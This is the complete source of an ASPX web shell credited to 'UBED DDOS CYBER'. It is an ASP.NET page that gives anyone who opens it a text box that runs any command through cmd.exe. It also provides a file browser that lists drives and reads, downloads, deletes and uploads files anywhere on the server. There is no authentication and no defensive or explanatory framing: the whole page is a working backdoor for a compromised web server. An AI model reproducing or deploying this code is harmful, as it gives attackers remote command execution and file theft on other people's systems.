<%-- ASPX Shell by UBED DDOS CYBER> (2007) --%><%@ Page Language="C#" EnableViewState="false" %><%@ Import Namespace="System.Web.UI.WebControls" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><% string outstr = ""; // get pwd string dir = Page.MapPath(".") + "/"; if (Request.QueryString["fdir"] != null) dir = Request.QueryString["fdir"] + "/"; dir = dir.Replace("\\", "/"); dir = dir.Replace("//", "/"); // build nav for path literal string[] dirparts = dir.Split('/'); string linkwalk = ""; foreach (string curpart in dirparts) { if (curpart.Length == 0) continue; linkwalk += curpart + "/"; outstr += string.Format("<a href='?fdir={0}'>{1}/</a>&nbsp;", HttpUtility.UrlEncode(linkwalk), HttpUtility.HtmlEncode(curpart)); } lblPath.Text = outstr; // create drive list outstr = ""; foreach(DriveInfo curdrive in DriveInfo.GetDrives()) { if (!curdrive.IsReady) continue; string driveRoot = curdrive.RootDirectory.Name.Replace("\\", ""); outstr += string.Format("<a href='?fdir={0}'>{1}</a>&nbsp;", HttpUtility.UrlEncode(driveRoot), HttpUtility.HtmlEncode(driveRoot)); } lblDrives.Text = outstr; // send file ? if ((Request.QueryString["get"] != null) && (Request.QueryString["get"].Length > 0)) { Response.ClearContent(); Response.WriteFile(Request.QueryString["get"]); Response.End(); } // delete file ? if ((Request.QueryString["del"] != null) && (Request.QueryString["del"].Length > 0)) File.Delete(Request.QueryString["del"]); // receive files ? if(flUp.HasFile) { string fileName = flUp.FileName; int splitAt = flUp.FileName.LastIndexOfAny(new char[] { '/', '\\' }); if (splitAt >= 0) fileName = flUp.FileName.Substring(splitAt); flUp.SaveAs(dir + "/" + fileName); } // enum directory and generate listing in the right pane DirectoryInfo di = new DirectoryInfo(dir); outstr = ""; foreach (DirectoryInfo curdir in di.GetDirectories()) { string fstr = string.Format("<a href='?fdir={0}'>{1}</a>", HttpUtility.UrlEncode(dir + "/" + curdir.Name), HttpUtility.HtmlEncode(curdir.Name)); outstr += string.Format("{0}&lt;DIR&gt;", fstr); } foreach (FileInfo curfile in di.GetFiles()) { string fstr = string.Format("<a href='?get={0}' target='_blank'>{1}</a>", HttpUtility.UrlEncode(dir + "/" + curfile.Name), HttpUtility.HtmlEncode(curfile.Name)); string astr = string.Format("<a href='?fdir={0}&del={1}'>Del</a>", HttpUtility.UrlEncode(dir), HttpUtility.UrlEncode(dir + "/" + curfile.Name)); outstr += string.Format("{0}{1:d}{2}", fstr, curfile.Length / 1024, astr); } lblDirOut.Text = outstr; // exec cmd ? if (txtCmdIn.Text.Length > 0) { Process p = new Process(); p.StartInfo.CreateNoWindow = true; p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + txtCmdIn.Text; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; p.StartInfo.WorkingDirectory = dir; p.Start(); lblCmdOut.Text = p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd(); txtCmdIn.Text = ""; } %><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" >ASPX Shell <title>ASPX Shell</title> <style type="text/css"> * { font-family: Arial; font-size: 12px; } body { margin: 0px; } pre { font-family: Courier New; background-color: #CCCCCC; } h1 { font-size: 16px; background-color: #00AA00; color: #FFFFFF; padding: 5px; } h2 { font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th { text-align: left; background-color: #99CC99; } td { background-color: #CCFFCC; } pre { margin: 2px; } </style>

ASPX Shell by UBED DDOS

<table style="width: 100%; border-width: 0px; padding: 5px;"> <td style="width: 50%; vertical-align: top;">

Shell

<asp:TextBox runat="server" ID="txtCmdIn" Width="300" /> <asp:Button runat="server" ID="cmdExec" Text="Execute" /> <pre><asp:Literal runat="server" ID="lblCmdOut" Mode="Encode" /></pre> <td style="width: 50%; vertical-align: top;">

File Browser

<p> Drives:<br /> <asp:Literal runat="server" ID="lblDrives" Mode="PassThrough" /> </p> <p> Working directory:<br /> <asp:Literal runat="server" ID="lblPath" Mode="passThrough" /> </p> <table style="width: 100%"> <th>Name</th> <th>Size KB</th> <th style="width: 50px">Actions</th> <asp:Literal runat="server" ID="lblDirOut" Mode="PassThrough" /> <p>Upload to this directory:<br /> <asp:FileUpload runat="server" ID="flUp" /> <asp:Button runat="server" ID="cmdUpload" Text="Upload" /> </p>